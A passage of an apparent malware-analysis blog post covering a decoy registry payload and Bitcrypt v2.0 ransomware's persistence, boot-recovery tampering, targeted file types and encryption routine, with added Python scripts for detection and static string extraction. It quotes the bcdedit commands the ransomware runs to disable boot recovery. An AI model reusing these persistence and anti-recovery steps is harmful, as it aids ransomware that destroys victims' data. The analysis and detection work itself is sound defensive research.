seg000:00000D2C push 7FF904BCh ; # "aReport"<br />
seg000:00000D31 push [ebp+var_20C]<br />
seg000:00000D37 call dword ptr ds:7FF90068h ; # GetProcAddress<br />
seg000:00000D3D test eax, eax<br />
seg000:00000D3F jz short _nextModule<br />
seg000:00000D41 call eax ; # call function "aReport"</blockquote>
<br />
<br />
<h3>
FAKE PAYLOAD</h3>
<br />
When it suspects that it is being analyzed or reversed, it executes its fake payload routine, which adds the following registry entries:<br />
<br />
<blockquote class="tr_bq">
HKEY_CLASSES_ROOT\.max   @ = "Matrix.Document"<br />
HKEY_CLASSES_ROOT\.max\ShellNew   NullFile = ""<br />
HKEY_CLASSES_ROOT\Matrix.Document   @ = "Matrix Document"<br />
HKEY_CLASSES_ROOT\Matrix.Document\DefaultIcon   @ = "{malware path}\{malware.exe},0"<br />
HKEY_CLASSES_ROOT\Matrix.Document\shell<br />
HKEY_CLASSES_ROOT\Matrix.Document\shell\open<br />
HKEY_CLASSES_ROOT\Matrix.Document\shell\open\command   @ = "{malware path}\{malware.exe} "%1""<br />
HKEY_CLASSES_ROOT\Matrix.Document\shell\print<br />
HKEY_CLASSES_ROOT\Matrix.Document\shell\print\command   @ = "{malware path}\{malware.exe} /p "%1""<br />
HKEY_CLASSES_ROOT\Matrix.Document\shell\printto<br />
HKEY_CLASSES_ROOT\Matrix.Document\shell\printto\command   @ = "{malware path}\{malware.exe} /pt "%1" "%2" "%3" "%4""<br />
HKEY_CURRENT_USER\Software\Matrix<br />
HKEY_CURRENT_USER\Software\Matrix\Recent File List<br />
HKEY_CURRENT_USER\Software\Matrix\Settings<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.max   @ = "Matrix.Document"<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.max\ShellNew   NullFile = ""<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document   @ = "Matrix Document"<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\DefaultIcon   @ = "{malware path}\{malware.exe},0"<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\open<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\open\command   @ = "{malware path}\{malware.exe} "%1""<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\print<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\print\command   @ = "{malware path}\{malware.exe} /p "%1""<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\printto<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Matrix.Document\shell\printto\command   @ = "{malware path}\{malware.exe} /pt "%1" "%2" "%3" "%4""</blockquote>
<br />
<br />
<br />Anonymous<br />
<br />
Bitcrypt v2.0 (2014-06-18)<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Bitcrypt is a ransomware program that encrypts certain types of files on the system using RSA public-key cryptography. It displays a message offering to decrypt the data once payment is made through Bitcoin.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Summary</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Upon execution, it creates a thread that periodically checks for and terminates running instances of taskmgr.exe and regedit.exe.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2yGkTP-5y1uDGscvDKbv5O_kx4nPRI2YXAIRkT24hzaQC3_J62imQBuQNSlX08JgMidLzAf3QBxQMXLfj9gjk2w9pd4Ib7t5xO9hOufaoWGtxZxM6P8CatpF12IAJnRPTaTjAZ9-Yg2c/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2yGkTP-5y1uDGscvDKbv5O_kx4nPRI2YXAIRkT24hzaQC3_J62imQBuQNSlX08JgMidLzAf3QBxQMXLfj9gjk2w9pd4Ib7t5xO9hOufaoWGtxZxM6P8CatpF12IAJnRPTaTjAZ9-Yg2c/s1600/5.png" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQgalgCQEtHB3yC4j4JrNfTnkW3BKMPVLd_pkbyz6v88N3PX82mWtk_qmEyWL4lwqoGTKQUCnb140wFwETfqwMeQlT9WF2kKThTCKtjXMCNe2mrtoKcsqLVm1Ww-UyWO4lR_m3KvRq60/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQgalgCQEtHB3yC4j4JrNfTnkW3BKMPVLd_pkbyz6v88N3PX82mWtk_qmEyWL4lwqoGTKQUCnb140wFwETfqwMeQlT9WF2kKThTCKtjXMCNe2mrtoKcsqLVm1Ww-UyWO4lR_m3KvRq60/s1600/7.png" height="31" width="400" /></a></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">
It also checks for the existence of the following registry entry:</span><br />
<div>
<ul>
<li><span style="background-color: white; line-height: 15.99959945678711px;"><span style="font-family: Arial, Helvetica, sans-serif;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\</span></span></li>
<ul>
<li><span style="background-color: white; line-height: 15.99959945678711px;"><span style="font-family: Arial, Helvetica, sans-serif;">Value Name: Bitcomint </span></span></li>
<li><span style="background-color: white; line-height: 15.99959945678711px;"><span style="font-family: Arial, Helvetica, sans-serif;">%APPDATA%\[RANDOM FILE NAME].exe</span></span></li>
</ul>
</ul>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 15.99959945678711px;">If the above registry entry does not exist, it creates it and drops a copy of itself in %APPDATA%. Having ensured that it will start every time Windows starts, it executes the following commands through cmd.exe (the /K switch keeps the command interpreter running after the command completes):</span></div>
<div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif; line-height: 15.99959945678711px;">/K bcdedit /set {bootmgr} displaybootmenu no</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif; line-height: 15.99959945678711px;">/K bcdedit /set {default} bootstatuspolicy ignoreallfailures</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0ALEXtaevJGbre7WZfn8qLu84nKqxnHqeHLIp1fQkmDq-AamY1fLTkCU08Z4j2ctZK5s2dwnS6mlP3xTlfS_BYcuhnWKlyFnCKMUlhGRCQ8R4h63joG82ycX4Y4gbIOWJytKT-reU0hw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0ALEXtaevJGbre7WZfn8qLu84nKqxnHqeHLIp1fQkmDq-AamY1fLTkCU08Z4j2ctZK5s2dwnS6mlP3xTlfS_BYcuhnWKlyFnCKMUlhGRCQ8R4h63joG82ycX4Y4gbIOWJytKT-reU0hw/s1600/1.png" height="116" width="640" /></span></a></li>
</ul>
</div>
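<div class="separator" style="clear: both; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">The two steps above, the %APPDATA% Run-key entry and the bcdedit calls that disable boot recovery, are what a detection engineer would want to alert on. The following is an added example and not code from the original post or from the sample: it runs over constructed telemetry lines whose field layout (ts=, event=, image=, cmdline=, key=, value=, data=) is an assumed Sysmon-like format, not any real product's schema, and the random file name in the Run key is invented.</span></div>

```python
"""
Added example, not code from the original post: flag the two persistence and
anti-recovery steps described above when they appear in endpoint telemetry.
The log lines are constructed for this example, and their field layout
(ts=, event=, image=, cmdline=, key=, value=, data=) is an assumed,
Sysmon-like format rather than any real product's schema. The random file
name in the Run key is likewise invented.
"""
import re

# bcdedit settings the sample applies. 'displaybootmenu no' hides the boot
# menu; 'bootstatuspolicy ignoreallfailures' stops Windows from offering the
# recovery screen after a failed boot. Both remove the user's easy way back.
BOOT_TAMPER = {
    ("{bootmgr}", "displaybootmenu", "no"),
    ("{default}", "bootstatuspolicy", "ignoreallfailures"),
}

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run$", re.I)
APPDATA_EXE = re.compile(r"(%APPDATA%|\\AppData\\Roaming)\\[^\\]+\.exe$", re.I)
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_line(line):
    """Split a 'key=value key="quoted value"' telemetry line into a dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD.finditer(line)}

def bcdedit_setting(cmdline):
    """Return the (identifier, element, value) triple of a 'bcdedit /set'
    command line, lower-cased, or None if the command line is not one."""
    toks = cmdline.lower().split()
    for i, tok in enumerate(toks):
        exe = tok.rsplit("\\", 1)[-1].strip('"')
        if exe in ("bcdedit", "bcdedit.exe") and toks[i + 1:i + 2] == ["/set"]:
            triple = tuple(toks[i + 2:i + 5])
            return triple if len(triple) == 3 else None
    return None

def detect(lines):
    """Return (ts, reason) alerts for boot-recovery tampering and for Run-key
    persistence that points into %APPDATA%, as this sample does."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev.get("event") == "process_create":
            setting = bcdedit_setting(ev.get("cmdline", ""))
            if setting in BOOT_TAMPER:
                alerts.append((ev["ts"], "boot recovery disabled: bcdedit /set %s %s %s" % setting))
        elif ev.get("event") == "registry_set":
            if RUN_KEY.search(ev.get("key", "")) and APPDATA_EXE.search(ev.get("data", "")):
                alerts.append((ev["ts"], "Run-key persistence: %s -> %s" % (ev.get("value"), ev["data"])))
    return alerts

# Constructed telemetry: two Bitcrypt-like events, one benign bcdedit query,
# one benign Run entry. Not captured from a real infection.
SAMPLE_LOG = [
    'ts=2014-06-18T10:02:11 event=registry_set key="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" value=Bitcomint data="%APPDATA%\\qkz3n.exe"',
    'ts=2014-06-18T10:02:12 event=process_create image="C:\\Windows\\System32\\cmd.exe" cmdline="cmd.exe /K bcdedit /set {bootmgr} displaybootmenu no"',
    'ts=2014-06-18T10:02:12 event=process_create image="C:\\Windows\\System32\\cmd.exe" cmdline="cmd.exe /K bcdedit /set {default} bootstatuspolicy ignoreallfailures"',
    'ts=2014-06-18T10:05:00 event=process_create image="C:\\Windows\\System32\\bcdedit.exe" cmdline="bcdedit /enum"',
    'ts=2014-06-18T10:06:00 event=registry_set key="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" value=OneDrive data="C:\\Program Files\\OneDrive.exe"',
]

if __name__ == "__main__":
    for ts, reason in detect(SAMPLE_LOG):
        print(ts, reason)
```

The bcdedit check keys on the parsed /set triple rather than on a substring, so a benign <code>bcdedit /enum</code> or a path-qualified <code>C:\Windows\System32\bcdedit.exe</code> is handled correctly; the Run-key check only fires when the target lives under %APPDATA%, which is where this sample puts itself.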
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Together these settings hide the boot menu and make Windows ignore boot failures instead of offering the recovery screen, which takes away the user's usual way to roll back. It then sets the Windows country or region location through the following registry entry:</span></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">HKEY_CURRENT_USER\Control Panel\International\Geo</span></li>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Value Name: Nation</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Data: 244 <i>(244 is the GeoID for the United States)</i></span></li>
</ul>
</ul>
<span style="font-family: Arial, Helvetica, sans-serif;">It then checks whether the following files exist in %APPDATA%; if not, it creates them, executes the copy of itself in %APPDATA%, and then terminates and deletes the currently running file.</span><br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">bitcrypt.ccw</span></li>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">This file contains the base64 strings, the BitCrypt ID and the encryption status of the files on the system</span></li>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">BitCrypt ID format</span></li>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">WIN -<region location of Windows>-<4 random numbers><index of base64 strings></span></li>
</ul>
</ul>
</ul>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif4ejKjzLh6CMHleKx8QExaq9HezNHxqyEFGmvbaDimOVMZDm7fgadvACJk1awM_i8ORFIfNAi83STTCWqsP-ekhPoYG8tsVV0GxnSKQ0Jni9njbxjcR00qbVpfBuTrm622jdyxKSMs0w/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif4ejKjzLh6CMHleKx8QExaq9HezNHxqyEFGmvbaDimOVMZDm7fgadvACJk1awM_i8ORFIfNAi83STTCWqsP-ekhPoYG8tsVV0GxnSKQ0Jni9njbxjcR00qbVpfBuTrm622jdyxKSMs0w/s1600/11.png" height="160" width="640" /></span></a></div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">BitCrypt.txt </span></li>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">This file tells the victim where to download the decryptor program. The note is written in 10 languages: English, French, German, Russian, Italian, Spanish, Portuguese, Japanese, Chinese and Arabic. It also claims that the files are encrypted with an RSA-1024 key. At the time of writing, the links given in this note are not accessible.</span></li>
</ul>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: Arial, Helvetica, sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVac0BGWGWIv76taOLNIiW5CR5iFkdhuLPuMrdb_KUaVZooYPoeQkJb37Nn8F8C2kV2itGCPch-Ad79RXpqShj2fsFiWJI2zvT88G8fzi5ztH5djRUzQ1BVFC9a-o1iUXMCdSxz-lCVrQ/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVac0BGWGWIv76taOLNIiW5CR5iFkdhuLPuMrdb_KUaVZooYPoeQkJb37Nn8F8C2kV2itGCPch-Ad79RXpqShj2fsFiWJI2zvT88G8fzi5ztH5djRUzQ1BVFC9a-o1iUXMCdSxz-lCVrQ/s1600/3.png" height="378" width="640" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It creates del.bat to delete the currently running file and execute the copy of itself in %APPDATA%.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHaIzgTvmURA5LZschx_Iur3iTQZuMe3Q9KEonXgPd6FRkR-SovO75NkTfbsM8Qfif91zJJOKnhhIIR5nN0vUZ0AGL_pb4BtXiIkQnC34vzC90dHKz2moOqgT56HP7UAarW3rn7rwnuZY/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHaIzgTvmURA5LZschx_Iur3iTQZuMe3Q9KEonXgPd6FRkR-SovO75NkTfbsM8Qfif91zJJOKnhhIIR5nN0vUZ0AGL_pb4BtXiIkQnC34vzC90dHKz2moOqgT56HP7UAarW3rn7rwnuZY/s1600/5.png" height="90" width="640" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Extraction of base 64 strings</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">This malware builds a jump table of the available base64 string arrays. Using the Delphi random number generator, it picks a random index that selects which set of strings to use at infection time.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJGsWlmjUzsGm5TZBZQvChQzAsHLZz-ID-eAnc_DHNSSkE1-1t5dWgVpBxw3Ecc-HHMzee14KHsd91-hlw2FZ8dn-f55D4CGOagAjGbDyg4Zb9NGQqfMOPPq3APl-kKoleiCmA2dqOsaU/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJGsWlmjUzsGm5TZBZQvChQzAsHLZz-ID-eAnc_DHNSSkE1-1t5dWgVpBxw3Ecc-HHMzee14KHsd91-hlw2FZ8dn-f55D4CGOagAjGbDyg4Zb9NGQqfMOPPq3APl-kKoleiCmA2dqOsaU/s1600/9.png" height="131" width="640" /></span></a></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">In the image above the string index is 1A2h. The malware code extracts the base64 string with the following instruction:</span></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">MOV EDX,DWORD PTR DS:[ESI*4+47DE98] <i>ESI = 1A2h (418)</i></span></li>
<ul>
<li><i><span style="font-family: Arial, Helvetica, sans-serif;">ESI*4 = 1A2h * 4 = 688h, so EDX is loaded from the DWORD at 47DE98h + 688h = 47E520h, the pointer to the selected string</span></i></li>
</ul>
</ul>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtgWySMXzSC9EeYV41s3WvE5wp04f3Is5WfdOdb0jki6GJzQLWJIpzg0eD93cWK9-wcJmpmEUVs33DnlF5Eoy1lIr7L69P0jtj1yvyUXqEY-mnUCH3BT0SpTHMaUgfEiM9mCLhnt3Xtrk/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtgWySMXzSC9EeYV41s3WvE5wp04f3Is5WfdOdb0jki6GJzQLWJIpzg0eD93cWK9-wcJmpmEUVs33DnlF5Eoy1lIr7L69P0jtj1yvyUXqEY-mnUCH3BT0SpTHMaUgfEiM9mCLhnt3Xtrk/s1600/10.png" height="94" width="640" /></span></a><br />
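<div class="separator" style="clear: both; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">The same lookup can be reproduced statically without running the sample: read the ESI-th DWORD from the table at 47DE98h and follow it to the NUL-terminated string. The script below is an added example, not code from the original post or from the malware. The table address 47DE98h and the index 1A2h are the values shown above; the flat in-memory image it reads from is constructed for the example (a real sample would be mapped from its PE sections, for instance with pefile), and for simplicity each table slot points at a single string rather than a whole string set.</span></div>

```python
"""
Added example, not code from the original post: reproduce the lookup
    MOV EDX, DWORD PTR DS:[ESI*4 + 47DE98h]
statically, i.e. read slot ESI of the pointer table at 47DE98h and follow
the pointer to the base64 string it refers to.

The image built below is constructed for this example: a flat buffer that
stands in for the mapped data section, with an assumed base address. Only
TABLE_VA and INDEX come from the post.
"""
import base64
import struct

TABLE_VA = 0x47DE98   # from the post: base of the pointer table
INDEX = 0x1A2         # from the post: ESI at the time of the lookup

def resolve_indexed_pointer(image, image_va, table_va, index):
    """Emulate MOV EDX,[index*4 + table_va]: return the 32-bit pointer stored
    in slot `index` of the table. `image` is a flat buffer mapped at image_va."""
    slot_va = table_va + index * 4        # 47DE98h + 688h = 47E520h for index 1A2h
    off = slot_va - image_va
    if not 0 <= off <= len(image) - 4:
        raise ValueError("table slot 0x%X is outside the mapped image" % slot_va)
    return struct.unpack_from("<I", image, off)[0]

def read_cstring(image, image_va, va, limit=4096):
    """Read a NUL-terminated ASCII string at `va` (a Delphi PChar / C string)."""
    off = va - image_va
    if not 0 <= off < len(image):
        raise ValueError("string pointer 0x%X is outside the mapped image" % va)
    end = image.find(b"\x00", off, off + limit)
    if end < 0:
        raise ValueError("unterminated string at 0x%X" % va)
    return image[off:end].decode("ascii")

def extract_b64_entry(image, image_va, table_va, index):
    """Full chain: table slot -> string pointer -> base64 text -> decoded bytes."""
    str_va = resolve_indexed_pointer(image, image_va, table_va, index)
    text = read_cstring(image, image_va, str_va)
    return text, base64.b64decode(text, validate=True)

def build_test_image(image_va, table_va, entries):
    """Constructed test data only: a flat image holding a pointer table at
    table_va whose slot i points to entries[i], laid out right after the table."""
    table_off = table_va - image_va
    buf = bytearray(table_off)                     # zero padding up to the table
    cur = table_va + len(entries) * 4              # first string follows the table
    blob = bytearray()
    for s in entries:
        buf += struct.pack("<I", cur)
        data = s.encode("ascii") + b"\x00"
        blob += data
        cur += len(data)
    return bytes(buf + blob)

# Constructed image: 1A3h slots so that index 1A2h is the last valid one.
IMAGE_VA = 0x47D000
ENTRIES = [base64.b64encode(("set-%03d" % i).encode()).decode() for i in range(INDEX + 1)]
IMAGE = build_test_image(IMAGE_VA, TABLE_VA, ENTRIES)

if __name__ == "__main__":
    text, decoded = extract_b64_entry(IMAGE, IMAGE_VA, TABLE_VA, INDEX)
    print("slot VA 0x%X -> %r -> %r" % (TABLE_VA + INDEX * 4, text, decoded))
```

The bounds checks matter on a real sample: an index past the end of the table reads whatever follows it as a pointer, which is exactly the kind of garbage a disassembler view makes easy to miss.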
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Infection Routine</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">This malware will encrypt files with the following file extensions:</span></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dbf</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.mdb</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.mde</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xls</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xlw</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.docx</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.doc</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.cer</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.key</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.rtf</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xlsm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xlsx</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.txt</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xlc</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.docm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xlk</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.text</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.ppt</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.djvu</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pdf</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.lzo</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.djv</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.cdx</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.cdt</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.cdr</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.bpg</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xfm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dfm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pas</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dpk</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dpr</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.frm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.vbp</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.php</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.js</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.wri</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.css</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.asm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.jpg</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.jpeg</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dbx</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dbt</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.odc</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.sql</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.abw</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pab</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.vsd</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xsf</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xsn</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pps</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.lzh</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pgp</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.arj</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.gz</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pst</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xl</span></li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It first searches for and lists all files with the above extensions.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; margin-left: 1em; margin-right: 1em;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXTRdb0tMAXWQh6mA2unIsz5vNzfbLRY_Ye0KnzK881i8ifKVWxa15rUtZRh3TZmqevprf4kM-LVQKpWnQwlnZxwUeNJKS5V4rafLTvMVbuWaejkyoPII59_loxP50BgETd_u-aP7SvTg/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXTRdb0tMAXWQh6mA2unIsz5vNzfbLRY_Ye0KnzK881i8ifKVWxa15rUtZRh3TZmqevprf4kM-LVQKpWnQwlnZxwUeNJKS5V4rafLTvMVbuWaejkyoPII59_loxP50BgETd_u-aP7SvTg/s1600/12.png" height="222" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It encrypts each target file, writes the encrypted data to a new file with the ".bitcrypt2" extension, and then deletes the original file.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwnev7NIcSShf09Ji5FVSCfl-91mblEVLeX2H0c8kGOVgqAKPdcsQ7Zin0Tl8mg4f0IuMLGUvDsmVEHWEMeM5wJQOddqEo2NfsGXgxAtHOAzG50imJzdUElcD5Xsvdsu2mrQS_nCmK8Rs/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwnev7NIcSShf09Ji5FVSCfl-91mblEVLeX2H0c8kGOVgqAKPdcsQ7Zin0Tl8mg4f0IuMLGUvDsmVEHWEMeM5wJQOddqEo2NfsGXgxAtHOAzG50imJzdUElcD5Xsvdsu2mrQS_nCmK8Rs/s1600/8.png" height="54" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
